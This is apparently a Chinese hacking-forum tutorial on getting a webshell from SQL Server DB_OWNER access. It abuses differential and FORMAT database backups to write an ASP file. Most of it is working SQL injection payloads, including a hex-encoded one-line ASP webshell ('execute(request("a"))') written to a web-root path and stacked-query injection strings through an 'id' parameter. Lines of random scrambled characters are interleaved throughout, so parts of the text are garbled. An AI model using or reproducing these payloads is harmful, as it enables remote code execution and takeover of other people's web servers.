DB_OWNER权限得到webshell的改进办法

admin

DB_OWNER权限得到webshell的两点改进:
' Y* E1 U; s5 y6 Q/ G9 A- a# w9 X
减少备份文件大小，得到可执行的webshell成功率提高不少
一利用差异备份
. H- [' {5 e& Z- {: g加一个参数WITH DIFFERENTIAL
6 l, U4 e* \  N# g7 N- A
) a* L% T5 X+ s) U4 E1
8 a5 F& @, G( _" T' z% E2
6 z7 c, U0 @% K$ Y  b) s; C# g9 V3
1 ?- s! r% u$ J; ^9 {. `$ s/ X4
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
create table [dbo].[xiaolu] ([cmd] [image]);
9 T$ S& g; P  i+ q8 einsert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
5 x2 k0 f, e8 ]. N( Jdeclare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL
- {5 J* L! o" m( W6 I# u0 X( x/ a
二利用完全FORMAT
( P& o! Q6 u: N: T: e加一个参数WITH FROMAT
有些页面对数据库要执行几次，而备份又默认是每次都以追加的方式，如果一个注入点对数据库有几次操作，而备份的文件就 几倍的增加，所以
3 G. A* S1 D! E7 y) T; T
6 w7 r. J# A2 r5 m# S, G1
: w! |. ^9 |3 u2 r2
3
5 a. F% M) |0 _/ y, b4
: {& X1 ^8 Z& E- G declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
create table [dbo].[xiaolu] ([cmd] [image]);
insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
% a5 u0 }$ o. U. {declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH FORMAT

7 n) W" M7 s: _  H6 M1 H总的来说就是那么简单几句,下面以备份数据库model为例子
: t3 ^5 q5 u! Y5 V1

1
; \% o% t( z; A id=1;use model create table cmd(str image);insert into cmd(str) values ('<%25execute(request("a"))%25>')
( m) V0 t+ O# C
( w  ?0 u2 r; T2

1
id=1;backup database model to disk='你的路径‘ with differential,format;--
2 F; r' `/ U5 V8 |$ H% ~* x6 B0 _